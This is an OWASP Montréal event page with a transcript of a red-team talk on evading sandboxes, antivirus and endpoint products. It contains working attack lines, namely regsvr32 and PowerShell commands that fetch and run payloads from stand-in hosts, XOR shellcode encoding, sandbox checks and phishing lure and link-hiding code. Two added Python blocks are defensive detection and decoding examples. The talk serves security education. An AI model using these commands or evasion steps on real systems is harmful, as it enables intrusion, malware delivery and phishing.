Endpoint Bypass Charles Hamilton

OWASP opened the 2017-2018 season of its Midis conférence (lunchtime talk) series by welcoming Mr. Charles F. Hamilton.

Our speaker gave an overview of the various factors that explain why security measures and solutions in general, whose purpose is to protect data, applications, networks or critical equipment, are so often bypassed or outright ineffective against targeted attacks.

Professional experience

Mr. Hamilton has more than 7 years of experience in information technology and information security, and has taken part in numerous engagements for American and Canadian clients: renowned banks, the nuclear industry, rail transport, government and, in some cases, political parties.

Mr. Hamilton has developed cutting-edge expertise and knowledge in techniques for attacking web applications, mobile applications and internal or external systems, and in exploit development. To the satisfaction of his clients, his expertise has been applied to high-security projects protecting nuclear power plants and banks, which gives him rare qualifications for tackling cyber security problems in highly sensitive sectors.

In addition to developing security tools, he is the founder and designer of an online training site for computer security and vulnerability testing used by more than 18,000 security enthusiasts. He is also very active in the Montreal community, having been a member of NorthSEC for 3 years.


OWASP Montréal

September 18, 2017

Transcript

  1. © Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL
    Bypassing Advanced Security Controls
    Charles F. Hamilton, Senior consultant at Mandiant
  2. About me
    • Charles F. Hamilton, Senior Consultant at Mandiant, OSCP, OSCE, GREM
    • Founder of the RingZer0 Team online CTF since 2014
    • 6+ years performing RedTeam/web application/Infrastructure testing for:
      o Banks, Nuclear, Education
      o Aerospace, Financial institutions, Insurance companies, Law firms
    • Enjoy writing low-level language code (Assembly, C)
    • Publicly published ~10 CVEs, ~100 of them unpublished
  3. Summary
    0x1 The Reason Behind Evasions and Bypasses
    0x2 Bypasses & Evasions VS Obfuscation
    0x3 Using Custom Executable
    0x4 Using Whitelisted Signed Binaries
    0x5 The Case of PowerShell
    0x6 Endpoint Solutions and Hooks
    0x7 Phishing Your Way In
    0x8 Targeting the Endpoint Security Product Itself
  4. 0x1 The Reason Behind Evasion and Bypasses
    Mature companies usually have several layers of protection to prevent attacks.
  5. 0x1 The Reason Behind Evasion and Bypasses
    • To achieve untrusted code execution on a targeted workstation, an attacker has to go through all of these layers
    • The classic approach used to avoid being detected is to act differently when executed on a security product, usually by preventing the execution of the malicious payload based on some fingerprinting
    • An attacker that manages to bypass all of the security layers will be able to execute code on the target system without being detected
  6. 0x2 Bypasses & Evasions VS Obfuscation
    Prioritize bypass and evasion over obfuscation. Examples:
        $a = 3;                                                // Original code
        $a = 1 + 2;                                            // Obfuscated
        if(context == "sandbox") { $a = 3; } else { exit(); }  // Evasion
  7. Problem with Sandbox solutions: they are fingerprintable and predictable
    Differences between endpoints (workstations/servers) and sandboxes:
    • Memory size (endpoint at least 4 Gb)
    • Disk size (endpoint at least 250 Gb)
    • Number of CPUs (endpoint at least 2 CPUs)
    • Processes currently running (if you send the sample by email, is OUTLOOK.exe running?)
    • Network access (does the sandbox have network access?)
    • Joined to a domain (sandboxes are usually not joined to the corporate domain)
    • Time zone (targeting a Canadian company)
    • Detecting hooks (sandboxes usually hook known API functions)
    • …
  8. 0x3 Using Custom Executable
    Let's build our malicious payload. In this case we are going to rely on Cobalt Strike reverse HTTPS shellcode. The snippet of code on the slide simply runs the shellcode as is. There are two major issues:
    ▪ The shellcode is well-known, most solutions will catch it (network and on-disk analysis)
    ▪ The code always attempts to execute the malicious payload
  9. 0x3 Using Custom Executable
    First step is to evade the shellcode detection. Simplest way to achieve this goal is to encode it. Classic XOR is usually enough. The idea:
    • Generate a random key (32 bit integer value, DWORD)
    • Use the key to XOR each 32 bit chunk of the original shellcode
    • Create a little assembly decryption stub that brute forces the key
    • Jump to the decoded version of the shellcode

        Key           Shellcode       Encoded
        0x2b403db7 ⊕  0xfce88600  =   0xd7a8bbb7
        0x2b403db7 ⊕  0x00006089  =   0x2b405d3e
        0x2b403db7 ⊕  0xe531d264  =   0xce71efd3
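The slide's table checked in code, together with the caveat a responder relies on: a repeating 32-bit XOR key is encoding, not encryption, and one chunk of expected plaintext (the well-known stager prologue the slide itself shows as its first DWORD) hands back the key and therefore the whole payload. Added example in Python, not from the talk; the sample bytes and the function names are constructed here.

```python
import struct

# Constructed sample (not the talk's payload): the twelve bytes behind the
# slide's three shellcode DWORDs, written in byte order as the slide does.
SHELLCODE = bytes.fromhex("fce88600" "00006089" "e531d264")
KEY = 0x2b403db7
# The DWORD an analyst would try as known plaintext: the slide's first chunk,
# the start of the well-known stager prologue the talk says "most solutions will catch".
KNOWN_PREFIX = 0xfce88600


def dwords(blob: bytes) -> list:
    """The 32-bit chunks of blob, in the slide's byte-order notation."""
    return list(struct.unpack(">%dI" % (len(blob) // 4), blob))


def xor_dwords(blob: bytes, key: int) -> bytes:
    """XOR every 4-byte chunk with the key; the same call encodes and decodes."""
    if len(blob) % 4:
        raise ValueError("blob length must be a multiple of 4")
    return b"".join(struct.pack(">I", w ^ key) for w in dwords(blob))


def recover_key(encoded: bytes, known_prefix: int = KNOWN_PREFIX) -> int:
    """Known-plaintext recovery: with a repeating 32-bit key, one chunk of
    expected plaintext gives the key directly (encoded XOR plaintext)."""
    return dwords(encoded[:4])[0] ^ known_prefix


def recover_plaintext(encoded: bytes, known_prefix: int = KNOWN_PREFIX) -> bytes:
    """Decode an encoded blob without the key, from the known prefix alone."""
    return xor_dwords(encoded, recover_key(encoded, known_prefix))


if __name__ == "__main__":
    enc = xor_dwords(SHELLCODE, KEY)
    print([hex(w) for w in dwords(enc)])  # the slide's Encoded row
    print(hex(recover_key(enc)))           # 0x2b403db7, the slide's key
```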
  10. 0x3 Using Custom Executable
    Original payload vs. encoded shellcode + decoder

  11. 0x3 Using Custom Executable
    • Our payload is now AV and IDS/IPS friendly.
    • To evade live analysis we need to find a way to avoid launching the payload in a sandbox environment.
    • Check the user domain:
  12. 0x3 Using Custom Executable
    Our final payload now looks like this:
  13. 0x3 Using Custom Executable
    Pros:
    ▪ This kind of payload will usually pass through pretty much everything except for endpoint protection
    ▪ Flexible, you can create your own evasion/bypass technique
    Cons:
    ▪ Since the endpoint meets all the requirements, it will execute the payload: the malicious code runs and is potentially detected
    ▪ Your payload will be written to the target disk
  14. 0x4 Using Whitelisted Signed Binaries
    • Endpoint solutions rely on heuristic detection, pattern matching, behavior, and enforced application whitelisting
    • The idea behind this approach is to use Windows signed binaries that can be used to execute code
  15. 0x4 Using Whitelisted Signed Binaries
    Several Windows binaries have been identified as good candidates for command execution:
    ▪ cdb.exe
    ▪ installutil.exe
    ▪ regsvr32.exe
    ▪ rundll32.exe
    ▪ msbuild.exe
    ▪ regasm.exe
    ▪ …
    Methods to execute code through all these binaries are well documented.
  16. 0x4 Using Whitelisted Signed Binaries
    • cdb.exe is a Microsoft Windows signed binary that can be used to perform application debugging. The debugger also provides a functionality that can be used to execute arbitrary commands:
        echo .shell whoami | cdb.exe C:\windows\system32\ipconfig.exe
  17. 0x4 Using Whitelisted Signed Binaries
    • It is also possible to execute shellcode directly using other whitelisted applications:
        regsvr32 /s /u /i:https://c2domain/payload.sct scrobj.dll
    • This command will run payload.sct, which is a VBScript, and execute the final payload relying only on trusted binaries
  18. 0x4 Using Whitelisted Signed Binaries
    Pros:
    ▪ Several whitelisting bypasses can be chained together to defeat endpoint solutions
    ▪ For example, executing the binary that we've created in the previous section using an application whitelisting bypass will probably pass through all the security layers
    Cons:
    ▪ These techniques are well known in the security industry; more advanced endpoint security products now block these known applications even if they are whitelisted
    ▪ Limited in the kind of payload you can execute
    ▪ Easy to prevent/block
  19. 0x5 The Case of PowerShell
    PowerShell is basically a built-in RAT for hackers and it comes with the following features:
    ▪ In-memory execution
    ▪ Full scripting engine
    ▪ Access to .NET languages (C#)
    ▪ Access to the Windows API
    ▪ Trusted Microsoft Windows signed binary
  20. 0x5 The Case of PowerShell
    • PowerShell allows you to execute PowerShell scripts in memory without touching the disk
    • IEX (Invoke-Expression):
        IEX (New-Object Net.WebClient).DownloadString("https://evil.domain/payload.ps1");
    • Script Block:
        $cmd = (New-Object Net.WebClient).DownloadString("https://evil.domain/payload.ps1");
        ([ScriptBlock]::Create($cmd)).Invoke();
    • Manual Approach:
    ▪ Use PowerShell functionalities to get the VirtualAlloc and CreateThread function pointers
    ▪ Copy your shellcode into the allocated memory location
    ▪ The shellcode can be dynamically downloaded using the Net.WebClient DownloadString method
    ▪ Jump to it using CreateThread and execute the shellcode
  21. 0x5 The Case of PowerShell
    • Executing code on a remote host without having credentials
    • Kerberos tickets can be used within the PowerShell context:
        PS> Import-Module .\Remote-WmiExecute.ps1; Remote-WmiExecute -ComputerName victim01 -Payload "cmd.exe /c whoami"
  22. 0x6 Endpoint Solutions and Hooks
    Most of the endpoint solutions rely on hooks at different levels:
    • I/O
    • Networking
    • Windows APIs
    Simply encrypt the payload a second time at the application level:
        Default PowerShell mimikatz.ps1
        → Encrypted using RC4
        → Sent over HTTPS
        → Windows decrypts the HTTPS stream
        → Network hook (only sees the RC4-encrypted payload)
        → PowerShell RAT decrypts the RC4
  23. 0x6 Endpoint Solutions and Hooks

  24. 0x6 Endpoint Solutions and Hooks
    Defeating on-disk detection is quite simple: never write anything to disk. PowerShell in-memory can run pretty much everything, including binaries.
  25. 0x7 Phishing Your Way In
    Five rules of successful phishing:
    • Don't put your malicious payload in the email
    • Don't allow automated solutions to be able to access your final payload
    • Use categorized domains
    • Try to fingerprint your victim as much as possible
    • Use HTTPS with a valid certificate (not self-signed)
  26. 0x7 Phishing Your Way In
    Rule #1: Don't put your malicious payload in the email
    • Usually we send the phishing email with a link to a server that we control:

        Hi Bob,
        We are currently updating our code of conduct policy, please review and accept as soon as possible.
        The code of conduct can be found here: https://phishy.domain/company/code/a2ef362e-45d0-b21d-5abf-edce29d365cb/
        Thank you,
        Bobby from HR
  27. 0x7 Phishing Your Way In
    Rule #2: Don't allow automated solutions to be able to access your final payload. Let's assume the HTML on the website looks like this:
        <a href="https://phishy.domain/payload.docm">download the code of conduct</a>
    Automated security can easily parse the HTML and find the link to the payload.
        <a id="download" href="#">download the code of conduct</a>
        <script>
        document.getElementById("download").onclick = function() {
            document.location = "https://phish" + "y.domain/pay" + "load.docm";
        };
        document.getElementById("download").click();
        </script>
    The click event is now dynamically generated using JavaScript. Most automated tools do not interpret the JavaScript and do not follow the redirection.
  28. 0x7 Phishing Your Way In
    Rule #3: Use categorized domains
    • Before the assessment, simply clone a legitimate website and ask the security products to categorize your domain
    • Hunting for already categorized expired domains can be useful
    Simple as that ☺
  29. 0x7 Phishing Your Way In
    Rule #4: Try to fingerprint your victim as much as possible
    • If you can fingerprint the domain used by the targeted company, adding a check similar to the one used for binaries can also save you
    • Based on the kind of solution they use, sometimes a macro will provide better results than HTA or ClickOnce
        if(context != "sandbox") { execute your final stage }
    Rule #5: Use HTTPS with a valid certificate
    • Let's Encrypt can provide you a free certificate
  30. 0x8 Targeting the Endpoint Security Product
    Companies use different approaches to detect threats:
    • Blacklisting known malicious binaries
    • Hash based
    • Heuristics
    • …
  31. 0x8 Targeting the Endpoint Security Product
    Certain solutions will blacklist known potentially malicious files, even if they are Microsoft signed binaries:
    • cdb.exe
    • installutil.exe
    • regsvr32.exe
    • rundll32.exe
    • msbuild.exe
    • regasm.exe
    They generally keep track of the binary hash (including old versions such as Windows 2000)
  32. 0x8 Targeting the Endpoint Security Product
    Since the detection is hash based, changing a single byte will change the hash and defeat it
        Original: 59bce9f07985f8a4204f4d6554cff708
        Modified: 432be6cf7311062633459eef6b242fb5
  33. 0x8 Targeting the Endpoint Security Product
    • Certain file formats will be trusted more than others:
    • Untrusted:
    ▪ exe
    ▪ ps1
    ▪ vbs
    ▪ docm, pdf
    • Generally trusted:
    ▪ Images (PNG, BMP, JPG)
    • Delivering shellcode inside valid polyglot images: most security engines will not even bother analyzing images
    ▪ Tools exist: https://github.com/Mr-Un1k0d3r/DKMC
  34. 0x8 Targeting the Endpoint Security Product
    Using PowerShell without relying on powershell.exe
    Technique one:
        C:\>copy %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe %temp%\randomname.txt
        C:\>%temp%\randomname.txt -Exec bypass whoami
    Technique two: use .NET (C# in this case) to invoke the PowerShell DLLs directly without using powershell.exe at all
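A defender's counterpart to slides 17 and 34, and to the hash-based blocking of slides 31 and 32: matching on the OriginalFileName carried in the PE version resource, rather than on the on-disk name or a file hash, catches the renamed powershell.exe copy, and a command-line rule catches the regsvr32 scriptlet load. Added example, not from the talk; the event lines are constructed here and modelled on Sysmon process-creation fields, and the rule names are invented.

```python
import re
from typing import Dict, List

# Constructed sample events (not from the talk), modelled on the Sysmon
# process-creation fields Image, OriginalFileName and CommandLine.
SAMPLE_EVENTS = [
    'Image=C:\\Users\\bob\\AppData\\Local\\Temp\\randomname.txt OriginalFileName=PowerShell.EXE CommandLine="randomname.txt -Exec bypass whoami"',
    'Image=C:\\Windows\\System32\\regsvr32.exe OriginalFileName=REGSVR32.EXE CommandLine="regsvr32 /s /u /i:https://c2domain/payload.sct scrobj.dll"',
    'Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe OriginalFileName=PowerShell.EXE CommandLine="powershell.exe -File build.ps1"',
    'Image=C:\\Windows\\System32\\regsvr32.exe OriginalFileName=REGSVR32.EXE CommandLine="regsvr32 /s app.dll"',
]

# Signed binaries the talk lists as code-execution candidates, plus PowerShell.
WATCHLIST = {"cdb.exe", "installutil.exe", "regsvr32.exe", "rundll32.exe",
             "msbuild.exe", "regasm.exe", "powershell.exe"}

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')  # key=value or key="value with spaces"


def parse_event(line: str) -> Dict[str, str]:
    """Split one key=value event line into a dict."""
    return {k: q or u for k, q, u in FIELD_RE.findall(line)}


def check_event(ev: Dict[str, str]) -> List[str]:
    """Return the names of the rules the event trips (empty list if none)."""
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    original = ev.get("OriginalFileName", "").lower()
    cmd = ev.get("CommandLine", "")
    hits = []
    # Rule 1: a watched binary running under another file name (slide 34 copies
    # powershell.exe to randomname.txt). OriginalFileName lives in the version
    # resource, so renaming does not change it and neither does the single-byte
    # hash change of slide 32 unless the patched byte sits in that resource.
    if original in WATCHLIST and image != original:
        hits.append("renamed-lolbin:" + original)
    # Rule 2: regsvr32 loading scrobj.dll with a scriptlet fetched over HTTP(S) (slide 17).
    if (original == "regsvr32.exe" and "scrobj.dll" in cmd.lower()
            and re.search(r"/i:https?://", cmd, re.I)):
        hits.append("regsvr32-remote-sct")
    # Rule 3: any PowerShell host started with the execution policy bypassed.
    if original == "powershell.exe" and re.search(r"-exec(?:utionpolicy)?\s+bypass", cmd, re.I):
        hits.append("powershell-exec-bypass")
    return hits


def scan(lines: List[str]) -> List[List[str]]:
    """Apply every rule to every event line; one hit list per line."""
    return [check_event(parse_event(line)) for line in lines]
```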
  35. 0x8 Targeting the Endpoint Security Product
        // Requires a reference to System.Management.Automation.dll
        using System.Collections.ObjectModel;
        using System.Management.Automation;
        using System.Management.Automation.Runspaces;

        // Host the PowerShell engine in-process instead of launching powershell.exe
        Runspace runspace = RunspaceFactory.CreateRunspace();
        runspace.Open();
        Pipeline pipe = runspace.CreatePipeline();
        pipe.Commands.AddScript("PowerShell script goes here");
        pipe.Commands.Add("Out-String");
        Collection<PSObject> output = pipe.Invoke();
        runspace.Close();
  36. 0x8 Targeting the Endpoint Security Product

  37. 0x9 Tools
    Search categorized domains: https://github.com/Mr-Un1k0d3r/CatMyFish
    RC4 ThunderShell RAT: https://github.com/Mr-Un1k0d3r/ThunderShell
    Polyglot image to deliver shellcode: https://github.com/Mr-Un1k0d3r/DKMC
    Shellcode obfuscator: https://github.com/Mr-Un1k0d3r/UniByAv
    SCT obfuscator (Cobalt Strike, Empire): https://github.com/Mr-Un1k0d3r/SCT-obfuscator
    PowerShell execution without invoking PowerShell: https://github.com/Mr-Un1k0d3r/PowerLessShell
    Malicious macro generator: https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator
    Remote WMI execute script: https://github.com/Mr-Un1k0d3r/RedTeamPowershellScripts/blob/master/scripts/Remote-WmiExecute.ps1
  38. EOF
    Questions? Thank you